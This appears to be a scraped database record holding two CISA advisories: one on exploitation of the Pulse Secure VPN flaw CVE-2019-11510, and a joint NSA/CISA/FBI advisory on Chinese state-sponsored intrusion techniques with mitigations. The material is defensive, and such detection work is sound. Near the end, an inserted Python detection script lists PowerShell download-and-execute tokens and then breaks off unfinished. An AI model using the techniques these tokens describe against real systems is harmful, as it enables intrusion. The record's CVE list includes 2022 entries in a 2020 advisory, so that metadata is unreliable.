Although Pulse Secure [[2]](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>) disclosed the vulnerability and provided software patches for the various affected products in April 2019, the Cybersecurity and Infrastructure Security Agency (CISA) continues to observe wide exploitation of CVE-2019-11510. [[3]](<https://www.kb.cert.org/vuls/id/927237/>) [[4]](<https://www.us-cert.gov/ncas/current-activity/2019/07/26/vulnerabilities-multiple-vpn-applications>) [[5]](<https://www.us-cert.gov/ncas/current-activity/2019/10/16/multiple-vulnerabilities-pulse-secure-vpn>)

CISA expects to see continued attacks exploiting unpatched Pulse Secure VPN environments and strongly urges users and administrators to upgrade to the corresponding fixes. [[6]](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)

## Timelines of Specific Events

 * April 24, 2019 – Pulse Secure releases initial advisory and software updates addressing multiple vulnerabilities.
 * May 28, 2019 – Large commercial vendors get reports of vulnerable VPN through HackerOne.
 * July 31, 2019 – Full use of exploit demonstrated using the admin session hash to get complete shell.
 * August 8, 2019 – Meh Chang and Orange Tsai demonstrate the VPN issues across multiple vendors (Pulse Secure) with detailed attack on active VPN exploitation.
 * August 24, 2019 – Bad Packets identifies over 14,500 vulnerable VPN servers globally still unpatched and in need of an upgrade.
 * October 7, 2019 – The National Security Agency (NSA) produces a Cybersecurity Advisory on Pulse Secure and other VPN products being targeted actively by advanced persistent threat actors.
 * October 16, 2019 – The CERT Coordination Center (CERT/CC) releases Vulnerability Note VU#927237: Pulse Secure VPN contains multiple vulnerabilities.
 * January 2020 – Media reports cybercriminals now targeting unpatched Pulse Secure VPN servers to install REvil (Sodinokibi) ransomware.

### Technical Details

## Impact

A remote, unauthenticated attacker may be able to compromise a vulnerable VPN server. The attacker may be able to gain access to all active users and their plain-text credentials. It may also be possible for the attacker to execute arbitrary commands on each VPN client as it successfully connects to the VPN server.

Affected versions:

 * Pulse Connect Secure 9.0R1 - 9.0R3.3
 * Pulse Connect Secure 8.3R1 - 8.3R7
 * Pulse Connect Secure 8.2R1 - 8.2R12
 * Pulse Connect Secure 8.1R1 - 8.1R15
 * Pulse Policy Secure 9.0R1 - 9.0R3.1
 * Pulse Policy Secure 5.4R1 - 5.4R7
 * Pulse Policy Secure 5.3R1 - 5.3R12
 * Pulse Policy Secure 5.2R1 - 5.2R12
 * Pulse Policy Secure 5.1R1 - 5.1R15

### Mitigations

This vulnerability has no viable workarounds except for applying the patches provided by the vendor and performing required system updates.

CISA strongly urges users and administrators to upgrade to the corresponding fixes. [[7]](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)

### References

[[1] NIST NVD CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)

[[2] Pulse Secure Advisory SA44101](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)

[[3] CERT/CC Vulnerability Note VU#927237](<https://www.kb.cert.org/vuls/id/927237/>)

[[4] CISA Current Activity: Vulnerabilities in Multiple VPN Applications](<https://www.us-cert.gov/ncas/current-activity/2019/07/26/vulnerabilities-multiple-vpn-applications>)

[[5] CISA Current Activity: Multiple Vulnerabilities in Pulse Secure VPN](<https://www.us-cert.gov/ncas/current-activity/2019/10/16/multiple-vulnerabilities-pulse-secure-vpn>)

[[6] Pulse Secure Advisory SA44101](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)

[[7] Pulse Secure Advisory SA44101](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)

### Revisions

January 10, 2020: Initial Version  
April 15, 2020: Revised to correct type of vulnerability
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-04-15T12:00:00", "type": "ics", "title": "Continued Exploitation of Pulse Secure VPN Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2020-04-15T12:00:00", "id": "AA20-010A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-010a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-23T07:08:20", "description": "
### Summary

_This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework, Version 9, and MITRE D3FEND™ framework, version 0.9.2-BETA-3. See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v8/techniques/enterprise/>) for all referenced threat actor tactics and techniques and the [D3FEND framework](<https://d3fend.mitre.org/>) for referenced defensive tactics and techniques._

The National Security Agency, Cybersecurity and Infrastructure Security Agency (CISA), and Federal Bureau of Investigation (FBI) assess that People's Republic of China state-sponsored malicious cyber activity is a major threat to U.S. and Allied cyberspace assets. Chinese state-sponsored cyber actors aggressively target U.S. and allied political, economic, military, educational, and critical infrastructure (CI) personnel and organizations to steal sensitive data, critical and emerging key technologies, intellectual property, and personally identifiable information (PII). Some target sectors include managed service providers, semiconductor companies, the Defense Industrial Base (DIB), universities, and medical institutions. These cyber operations support China's long-term economic and military development objectives.

This Joint Cybersecurity Advisory (CSA) provides information on tactics, techniques, and procedures (TTPs) used by Chinese state-sponsored cyber actors.
This advisory builds on previous NSA, CISA, and FBI reporting to inform federal, state, local, tribal, and territorial (SLTT) government, CI, DIB, and private industry organizations about notable trends and persistent TTPs through collaborative, proactive, and retrospective analysis.

To increase the defensive posture of their critical networks and reduce the risk of Chinese malicious cyber activity, NSA, CISA, and FBI urge government, CI, DIB, and private industry organizations to apply the recommendations listed in the Mitigations section of this advisory and in Appendix A: Chinese State-sponsored Cyber Actors' Observed Procedures. **Note:** NSA, CISA, and FBI encourage organization leaders to review [CISA Joint Insights: Chinese Malicious Cyber Activity: Threat Overview for Leaders](<https://www.cisa.gov/publication/chinese-cyber-threat-overview-and-actions-leaders>) for information on this threat to their organization.

[Click here](<https://media.defense.gov/2021/Jul/19/2002805003/-1/-1/1/CSA_CHINESE_STATE-SPONSORED_CYBER_TTPS.PDF>) for a PDF version of this report.

### Technical Details

#### **Trends in Chinese State-Sponsored Cyber Operations**

NSA, CISA, and FBI have observed increasingly sophisticated Chinese state-sponsored cyber activity targeting U.S. political, economic, military, educational, and CI personnel and organizations. NSA, CISA, and FBI have identified the following trends in Chinese state-sponsored malicious cyber operations through proactive and retrospective analysis:

 * **Acquisition of Infrastructure and Capabilities.** Chinese state-sponsored cyber actors remain agile and cognizant of the information security community's practices. These actors take effort to mask their activities by using a revolving series of virtual private servers (VPSs) and common open-source or commercial penetration tools.

 * **Exploitation of Public Vulnerabilities.** Chinese state-sponsored cyber actors consistently scan target networks for critical and high vulnerabilities within days of the vulnerability's public disclosure. In many cases, these cyber actors seek to exploit vulnerabilities in major applications, such as Pulse Secure, Apache, F5 Big-IP, and Microsoft products. For information on Common Vulnerabilities and Exposures (CVE) known to be exploited by malicious Chinese state-sponsored cyber actors, see:

   * CISA-FBI Joint CSA AA20-133A: [Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>),
   * CISA Activity Alert AA20-275A: [Potential for China Cyber Response to Heightened U.S.-China Tensions](<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>), and
   * NSA CSA U/OO/179811-20: [Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>).

 * **Encrypted Multi-Hop Proxies.** Chinese state-sponsored cyber actors have been routinely observed using a VPS as an encrypted proxy. The cyber actors use the VPS as well as small office and home office (SOHO) devices as operational nodes to evade detection.

#### **Observed Tactics and Techniques**

Chinese state-sponsored cyber actors use a full array of tactics and techniques to exploit computer networks of interest worldwide and to acquire sensitive intellectual property, economic, political, and military information. Appendix B: MITRE ATT&CK Framework lists the tactics and techniques used by Chinese state-sponsored cyber actors. A downloadable [JSON file](<https://github.com/nsacyber/chinese-state-sponsored-cyber-operations-observed-ttps>) is also available on the [NSA Cybersecurity GitHub page](<https://github.com/nsacyber>).

Refer to Appendix A: Chinese State-Sponsored Cyber Actors' Observed Procedures for information on procedures affiliated with these tactics and techniques as well as applicable mitigations.

_Figure 1: Example of tactics and techniques used in various cyber operations._

### Mitigations

NSA, CISA, and FBI urge federal and SLTT government, CI, DIB, and private industry organizations to apply the following recommendations as well as the detection and mitigation recommendations in Appendix A, which are tailored to observed tactics and techniques:

 * **Patch systems and equipment promptly and diligently.** Focus on patching critical and high vulnerabilities that allow for remote code execution or denial-of-service on externally facing equipment and CVEs known to be exploited by Chinese state-sponsored cyber actors. Consider implementing a patch management program that enables a timely and thorough patching cycle.  
   **Note:** for more information on CVEs routinely exploited by Chinese state-sponsored cyber actors refer to the resources listed in the Trends in Chinese State-Sponsored Cyber Operations section.

 * **Enhance monitoring of network traffic, email, and endpoint systems.** Review network signatures and indicators for focused activities, monitor for new phishing themes, and adjust email rules accordingly. Follow the best practices of restricting attachments via email and blocking URLs and domains based upon reputation. Ensure that log information is aggregated and correlated to enable maximum detection capabilities, with a focus on monitoring for account misuse. Monitor common ports and protocols for command and control (C2) activity. SSL/TLS inspection can be used to see the contents of encrypted sessions to look for network-based indicators of malware communication protocols. Implement and enhance network and endpoint event analysis and detection capabilities to identify initial infections, compromised credentials, and the manipulation of endpoint processes and files.

 * **Use protection capabilities to stop malicious activity.** Implement anti-virus software and other endpoint protection capabilities to automatically detect and prevent malicious files from executing. Use a network intrusion detection and prevention system to identify and prevent commonly employed adversarial malware and limit nefarious data transfers. Use a domain reputation service to detect suspicious or malicious domains. Use strong credentials for service accounts and multi-factor authentication (MFA) for remote access to mitigate an adversary's ability to leverage stolen credentials, but be aware of MFA interception techniques for some MFA implementations.

### Resources

Refer to [us-cert.cisa.gov/china](<https://us-cert.cisa.gov/china>), <https://www.ic3.gov/Home/IndustryAlerts>, and [https://www.nsa.gov/What-We-Do/Cybersecurity/Advisories-Technical-Guidance/](<https://www.nsa.gov/What-We-Do/Cybersecurity/Advisories-Technical-Guidance/>) for previous reporting on Chinese state-sponsored malicious cyber activity.

### Disclaimer of Endorsement

The information and opinions contained in this document are provided "as is" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.

### Purpose

This document was developed by NSA, CISA, and FBI in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.  
This document is marked TLP:WHITE. Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol, see [http://www.us-cert.gov/tlp/](<http://www.us-cert.gov/tlp/>).

### Trademark Recognition

 * MITRE and ATT&CK are registered trademarks of The MITRE Corporation.
 * D3FEND is a trademark of The MITRE Corporation.
 * Microsoft, Microsoft Exchange, Office 365, Microsoft Office, OneDrive, Outlook, OWA, PowerShell, Windows Defender, and Windows are registered trademarks of Microsoft Corporation.
 * Pulse Secure is a registered trademark of Pulse Secure, LLC.
 * Apache is a registered trademark of Apache Software Foundation.
 * F5 and BIG-IP are registered trademarks of F5 Networks.
 * Cobalt Strike is a registered trademark of Strategic Cyber LLC.
 * GitHub is a registered trademark of GitHub, Inc.
 * JavaScript is a registered trademark of Oracle Corporation.
 * Python is a registered trademark of Python Software Foundation.
 * Unix is a registered trademark of The Open Group.
 * Linux is a registered trademark of Linus Torvalds.
 * Dropbox is a registered trademark of Dropbox, Inc.

### APPENDIX A: Chinese State-Sponsored Cyber Actors' Observed Procedures

**Note:** D3FEND techniques are based on the Threat Actor Procedure(s) and may not match automated mappings to ATT&CK techniques and sub-techniques.

### Tactics: _Reconnaissance_ [[TA0043](<https://attack.mitre.org/versions/v9/tactics/TA0043>)]

_Table 1: Chinese state-sponsored cyber actors' Reconnaissance TTPs with detection and mitigation recommendations_

**Threat Actor Technique / Sub-Techniques:** Active Scanning [[T1595](<https://attack.mitre.org/versions/v9/techniques/T1595>)]; Gather Victim Network Information [[T1590](<https://attack.mitre.org/versions/v9/techniques/T1590>)]

**Threat Actor Procedure(s):** Chinese state-sponsored cyber actors have been assessed to perform reconnaissance on Microsoft® 365 (M365), formerly Office® 365, resources with the intent of further gaining information about the networks. These scans can be automated, through Python® scripts, to locate certain files, paths, or vulnerabilities. The cyber actors can gain valuable information on the victim network, such as the allocated resources, an organization's fully qualified domain name, IP address space, and open ports to target or exploit.

**Detection and Mitigation Recommendations:** Minimize the amount and sensitivity of data available to external parties, for example:

 * Scrub user email addresses and contact lists from public websites, which can be used for social engineering,
 * Share only necessary data and information with third parties, and
 * Monitor and limit third-party access to the network.

Active scanning from cyber actors may be identified by monitoring network traffic for sources associated with botnets, adversaries, and known bad IPs based on threat intelligence.

**Defensive Tactics and Techniques:**

Detect:

 * Network Traffic Analysis
   * Connection Attempt Analysis [[D3-CAA](<https://d3fend.mitre.org/technique/d3f:ConnectionAttemptAnalysis>)]

Isolate:

 * Network Isolation
   * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]

### Tactics: _Resource Development_ [[TA0042](<https://attack.mitre.org/versions/v9/tactics/TA0042>)]

_Table II: Chinese state-sponsored cyber actors' Resource Development TTPs with detection and mitigation recommendations_

**Threat Actor Technique / Sub-Techniques:** Acquire Infrastructure [[T1583](<https://attack.mitre.org/versions/v9/techniques/T1583>)]; Stage Capabilities [[T1608](<https://attack.mitre.org/versions/v9/techniques/T1608>)]

**Threat Actor Procedure(s):** Chinese state-sponsored cyber actors have been observed using VPSs from cloud service providers that are physically distributed around the world to host malware and function as C2 nodes.

**Detection and Mitigation Recommendations:** Adversary activities occurring outside the organization's boundary of control and view make mitigation difficult. Organizations can monitor for unexpected network traffic and data flows to and from VPSs and correlate other suspicious activity that may indicate an active threat.

**Defensive Tactics and Techniques:** N/A

**Threat Actor Technique / Sub-Techniques:** Obtain Capabilities [[T1588](<https://attack.mitre.org/versions/v9/techniques/T1588>)]: Tools [[T1588.002](<https://attack.mitre.org/versions/v9/techniques/T1588/002>)]

**Threat Actor Procedure(s):** Chinese state-sponsored cyber actors have been observed using Cobalt Strike® and tools from GitHub® on victim networks.

**Detection and Mitigation Recommendations:** Organizations may be able to identify malicious use of Cobalt Strike by:

 * Examining network traffic using Transport Layer Security (TLS) inspection to identify Cobalt Strike. Look for human-generated versus machine-generated traffic, which will be more uniformly distributed.
 * Looking for the default Cobalt Strike TLS certificate.
 * Looking at the user agent that generates the TLS traffic for discrepancies that may indicate faked and malicious traffic.
 * Reviewing the traffic destination domain, which may be malicious and an indicator of compromise.
 * Looking at the packet's HTTP host header. If it does not match the destination domain, it may indicate a fake Cobalt Strike header and profile.
 * Checking the Uniform Resource Identifier (URI) of the flow to see if it matches one associated with Cobalt Strike's malleable C2 language. If discovered, additional recovery and investigation will be required.

**Defensive Tactics and Techniques:** N/A

### Tactics: _Initial Access_ [[TA0001](<https://attack.mitre.org/versions/v9/tactics/TA0001/>)]

_Table III: Chinese state-sponsored cyber actors' Initial Access TTPs with detection and mitigation recommendations_

**Threat Actor Technique / Sub-Techniques:** Drive By Compromise [[T1189](<https://attack.mitre.org/versions/v9/techniques/T1189>)]

**Threat Actor Procedure(s):** Chinese state-sponsored cyber actors have been observed gaining access to victim networks through watering hole campaigns of typo-squatted domains.

**Detection and Mitigation Recommendations:**

 * Ensure all browsers and plugins are kept up to date.
 * Use modern browsers with security features turned on.
 * Restrict the use of unneeded websites, block unneeded downloads/attachments, block unneeded JavaScript®, restrict browser extensions, etc.
 * Use adblockers to help prevent malicious code served through advertisements from executing.
 * Use script blocking extensions to help prevent the execution of unneeded JavaScript, which may be used during exploitation processes.
 * Use browser sandboxes or remote virtual environments to mitigate browser exploitation.
 * Use security applications that look for behavior used during exploitation, such as Windows Defender® Exploit Guard (WDEG).

**Defensive Tactics and Techniques:**

Detect:

 * Identifier Analysis
   * Homoglyph Detection [[D3-HD](<https://d3fend.mitre.org/technique/d3f:HomoglyphDetection>)]
   * URL Analysis [[D3-UA](<https://d3fend.mitre.org/technique/d3f:URLAnalysis>)]
 * File Analysis
   * Dynamic Analysis [[D3-DA](<https://d3fend.mitre.org/technique/d3f:DynamicAnalysis>)]

Isolate:

 * Execution Isolation
   * Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]
   * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]
 * Network Isolation
   * DNS Denylisting [[D3-DNSDL](<https://d3fend.mitre.org/technique/d3f:DNSDenylisting>)]
   * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)]

**Threat Actor Technique / Sub-Techniques:** Exploit Public-Facing Application [[T1190](<https://attack.mitre.org/versions/v9/techniques/T1190>)]

**Threat Actor Procedure(s):** Chinese state-sponsored cyber actors have exploited known vulnerabilities in Internet-facing systems. [[1](<https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html%20>)] For information on vulnerabilities known to be exploited by Chinese state-sponsored cyber actors, refer to the Trends in Chinese State-Sponsored Cyber Operations section for a list of resources.

Chinese state-sponsored cyber actors have also been observed:

 * Using short-term VPS devices to scan and exploit vulnerable Microsoft Exchange® Outlook Web Access (OWA®) and plant webshells.
 * Targeting on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments to gain access to cloud resources.
 * Deploying a public proof of concept (POC) exploit targeting a public-facing appliance vulnerability.

|

Review previously published alerts and advisories from NSA, CISA, and FBI, and diligently patch vulnerable applications known to be exploited by cyber actors. Refer to the Trends in Chinese State-Sponsored Cyber Operations section for a non-inclusive list of resources.

Additional mitigations include:

 * Consider implementing Web Application Firewalls (WAF), which can prevent exploit traffic from reaching an application.
 * Segment externally facing servers and services from the rest of the network with a demilitarized zone (DMZ).
 * Use multi-factor authentication (MFA) with strong factors and require regular re-authentication.
 * Disable protocols using weak authentication.
 * Limit access to and between cloud resources with the desired state being a Zero Trust model. For more information refer to NSA Cybersecurity Information Sheet: [[Embracing a Zero Trust Security Model](<https://media.defense.gov/2021/Feb/25/2002588479/-1/-1/0/CSI_EMBRACING_ZT_SECURITY_MODEL_UOO115131-21.PDF>)].
 * When possible, use cloud-based access controls on cloud resources (e.g., cloud service provider (CSP)-managed authentication between virtual machines).
 * Use automated tools to audit access logs for security concerns.
 * Where possible, enforce MFA for password resets.
 * Do not include Application Programming Interface (API) keys in software version control systems where they can be unintentionally leaked.
|

Harden:

 * Application Hardening [[D3-AH](<https://d3fend.mitre.org/technique/d3f:ApplicationHardening>)]
 * Platform Hardening
   * Software Update [[D3-SU](<https://d3fend.mitre.org/technique/d3f:SoftwareUpdate>)]

Detect:

 * File Analysis [[D3-FA](<https://d3fend.mitre.org/technique/d3f:FileAnalysis>)]
 * Network Traffic Analysis
   * Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]
 * Process Analysis
   * Process Spawn Analysis
     * Process Lineage Analysis [[D3-PLA](<https://d3fend.mitre.org/technique/d3f:ProcessLineageAnalysis>)]

Isolate:

 * Network Isolation
   * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]

Phishing [[T1566](<https://attack.mitre.org/versions/v9/techniques/T1566>)]:

 * Spearphishing Attachment [[T1566.001](<https://attack.mitre.org/versions/v9/techniques/T1566/001>)]
 * Spearphishing Link [[T1566.002](<https://attack.mitre.org/versions/v9/techniques/T1566/002>)]

|

Chinese state-sponsored cyber actors have been observed conducting spearphishing campaigns. These email compromise attempts range from generic emails with mass targeted phishing attempts to specifically crafted emails in targeted social engineering lures.
\nThese compromise attempts use the cyber actors\u2019 dynamic collection of VPSs, previously compromised accounts, or other infrastructure in order to encourage engagement from the target audience through domain typo-squatting and masquerading. These emails may contain a malicious link or files that will provide the cyber actor access to the victim\u2019s device after the user clicks on the malicious link or opens the attachment. \n\n| \n\n * Implement a user training program and simulated spearphishing emails to discourage users from visiting malicious websites or opening malicious attachments and re-enforce the appropriate user responses to spearphishing emails. Quarantine suspicious files with antivirus solutions.\n * Use a network intrusion prevention system (IPS) to scan and remove malicious email attachments.\n * Block uncommon file types in emails that are not needed by general users (`.exe`, `.jar`,`.vbs`)\n * Use anti-spoofing and email authentication mechanisms to filter messages based on validity checks of the sender domain (using Sender Policy Framework [SPF]) and integrity of messages (using Domain Keys Identified Mail [DKIM]). 
Enabling these mechanisms within an organization (through policies such as Domain-based Message Authentication, Reporting, and Conformance [DMARC]) may enable recipients (intra-org and cross domain) to perform similar message filtering and validation.\n * Determine if certain websites that can be used for spearphishing are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.\n * Prevent users from clicking on malicious links by stripping hyperlinks or implementing \"URL defanging\" at the Email Security Gateway or other email security tools.\n * Add external sender banners to emails to alert users that the email came from an external sender.\n| \n\nHarden: \n\n * Message Hardening \n * Message Authentication [[D3-MAN](<https://d3fend.mitre.org/technique/d3f:MessageAuthentication>)]\n * Transfer Agent Authentication [[D3-TAAN](<https://d3fend.mitre.org/technique/d3f:TransferAgentAuthentication>)]\n\nDetect: \n\n * File Analysis \n * Dynamic Analysis [[D3-DA](<https://d3fend.mitre.org/technique/d3f:DynamicAnalysis>)]\n * Identifier Analysis \n * Homoglyph Detection [[D3-HD](<https://d3fend.mitre.org/technique/d3f:HomoglyphDetection>)]\n * URL Analysis [[D3-UA](<https://d3fend.mitre.org/technique/d3f:URLAnalysis>)]\n * Message Analysis \n * Sender MTA Reputation Analysis [[D3-SMRA](<https://d3fend.mitre.org/technique/d3f:SenderMTAReputationAnalysis>)]\n * Sender Reputation Analysis [[D3-SRA](<https://d3fend.mitre.org/technique/d3f:SenderReputationAnalysis>)] \n \n \nExternal Remote Services [[T1133](<https://attack.mitre.org/versions/v9/techniques/T1133>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed:\n\n * Exploiting vulnerable devices immediately after conducting scans for critical zero-day or publicly disclosed vulnerabilities. 
The cyber actors used or modified public proof of concept code in order to exploit vulnerable systems.\n\n * Targeting Microsoft Exchange offline address book (OAB) virtual directories (VDs).\n\n * Exploiting Internet accessible webservers using webshell small code injections against multiple code languages, including `net`, `asp`, `apsx`, `php`, `japx`, and `cfm`. \n\n**Note:** refer to the references listed above in Exploit Public-Facing Application [[T1190](<https://attack.mitre.org/versions/v9/techniques/T1190>)] for information on CVEs known to be exploited by malicious Chinese cyber actors.\n\n**Note: **this technique also applies to Persistence [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)].\n\n| \n\n * Many exploits can be mitigated by applying available patches for vulnerabilities (such as CVE-2019-11510, CVE-2019-19781, and CVE-2020-5902) affecting external remote services.\n * Reset credentials after virtual private network (VPN) devices are upgraded and reconnected to the external network.\n * Revoke and generate new VPN server keys and certificates (this may require redistributing VPN connection information to users).\n * Disable Remote Desktop Protocol (RDP) if not required for legitimate business functions.\n * Restrict VPN traffic to and from managed service providers (MSPs) using a dedicated VPN connection.\n * Review and verify all connections between customer systems, service provider systems, and other client enclaves.\n| \n\nHarden:\n\n * Software Update [[D3-SU](<https://d3fend.mitre.org/technique/d3f:SoftwareUpdate>)]\n\nDetect:\n\n * Network Traffic Analysis \n * Connection Attempt Analysis [[D3-CAA](<https://d3fend.mitre.org/technique/d3f:ConnectionAttemptAnalysis>)]\n * Platform Monitoring [[D3-PM](<https://d3fend.mitre.org/technique/d3f:PlatformMonitoring>)]\n * Process Analysis \n * Process Spawn Analysis [[D3-SPA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)] \n * Process Lineage Analysis 
[[D3-PLA](<https://d3fend.mitre.org/technique/d3f:ProcessLineageAnalysis>)] \n \nValid Accounts [[T1078](<https://attack.mitre.org/versions/v9/techniques/T1078>)]:\n\n * Default Accounts [[T1078.001](<https://attack.mitre.org/versions/v9/techniques/T1078/001>)]\n\n * Domain Accounts [[T1078.002](<https://attack.mitre.org/versions/v9/techniques/T1078/002>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed: gaining credential access into victim networks by using legitimate, but compromised credentials to access OWA servers, corporate login portals, and victim networks.\n\n**Note:** this technique also applies to Persistence [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)], Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)], and Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)].\n\n| \n\n * Adhere to best practices for password and permission management.\n * Ensure that MSP accounts are not assigned to administrator groups and restrict those accounts to only systems they manage \n * Do not store credentials or sensitive data in plaintext.\n * Change all default usernames and passwords.\n * Routinely update and secure applications using Secure Shell (SSH). 
 * Update SSH keys regularly and keep private keys secure.
 * Routinely audit privileged accounts to identify malicious use.
|

Harden:

 * Credential Hardening
   * Multi-factor Authentication [[D3-MFA](<https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication>)]

Detect:

 * User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)]
   * Authentication Event Thresholding [[D3-ANET](<https://d3fend.mitre.org/technique/d3f:AuthenticationEventThresholding>)]
   * Job Function Access Pattern Analysis [[D3-JFAPA](<https://d3fend.mitre.org/technique/d3f:JobFunctionAccessPatternAnalysis>)]

### Tactics: _Execution_ [[TA0002](<https://attack.mitre.org/versions/v9/tactics/TA0002>)]

_Table IV: Chinese state-sponsored cyber actors’ Execution TTPs with detection and mitigation recommendations_

Threat Actor Technique / Sub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques
---|---|---|---

Command and Scripting Interpreter [[T1059](<https://attack.mitre.org/versions/v9/techniques/T1059>)]:

 * PowerShell® [[T1059.001](<https://attack.mitre.org/versions/v9/techniques/T1059/001>)]
 * Windows® Command Shell [[T1059.003](<https://attack.mitre.org/versions/v9/techniques/T1059/003>)]
 * Unix® Shell [[T1059.004](<https://attack.mitre.org/versions/v9/techniques/T1059/004>)]
 * Python [[T1059.006](<https://attack.mitre.org/versions/v9/techniques/T1059/006>)]
 * JavaScript [[T1059.007](<https://attack.mitre.org/versions/v9/techniques/T1059/007>)]
 * Network Device CLI [[T1059.008](<https://attack.mitre.org/versions/v9/techniques/T1059/008>)]

|

Chinese state-sponsored cyber actors have been observed:

 * Using cmd.exe, the JavaScript/JScript interpreter, and network device command line interpreters (CLI).
 * Using PowerShell to conduct reconnaissance, enumeration, and discovery of the victim network.
 * Employing Python scripts to exploit vulnerable servers.
 * Using a UNIX shell in order to conduct discovery, enumeration, and lateral movement on Linux® servers in the victim network.

|

PowerShell

 * Turn on PowerShell logging. (**Note:** this works better in newer versions of PowerShell. NSA, CISA, and FBI recommend using version 5 or higher.)
 * Push PowerShell logs into a security information and event management (SIEM) tool.
 * Monitor for suspicious behavior and commands. Regularly evaluate and update blocklists and allowlists.
 * Use an antivirus program, which may stop malicious code execution that cyber actors attempt to execute via PowerShell.
 * Remove PowerShell if it is not necessary for operations.
 * Restrict which commands can be used.

Windows Command Shell

 * Restrict use to administrator, developer, or power user systems. Consider its use suspicious and investigate, especially if average users run scripts.
 * Investigate scripts running out of cycle from patching or other administrator functions if scripts are not commonly used on a system, but enabled.
 * Monitor for and investigate other unusual or suspicious scripting behavior.

Unix

 * Use application controls to prevent execution.
 * Monitor for and investigate unusual scripting behavior. Use of the Unix shell may be common on administrator, developer, or power user systems. In this scenario, normal users running scripts should be considered suspicious.
 * If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions should be considered suspicious.
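The PowerShell items above recommend turning on logging, forwarding it to a SIEM, and monitoring for suspicious commands. The following is an added example, not code from the advisory or from any product, of what that monitoring can do with one routine evasion, the Base64-encoded `-EncodedCommand` argument: it decodes the script from constructed process-creation records in a hypothetical `key=value` log format and flags download-and-execute indicators and hidden-window launches. The field names, the indicator list, and the sample records are assumptions.

```python
"""Decode PowerShell -EncodedCommand arguments found in process-creation
log lines and flag the ones whose decoded script carries download-and-execute
indicators or that were launched with a hidden window.

The key=value record layout and the sample records are constructed for this
example; they are not a real product's telemetry format."""
import base64
import binascii
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Tokens in the *decoded* script that warrant analyst review (illustrative, not exhaustive).
SUSPICIOUS_TOKENS = ("invoke-expression", "iex", "downloadstring", "downloadfile", "frombase64string")

# Common spellings of the -EncodedCommand switch. PowerShell also accepts any other
# unambiguous prefix (e.g. -encod), which a production rule should cover as well.
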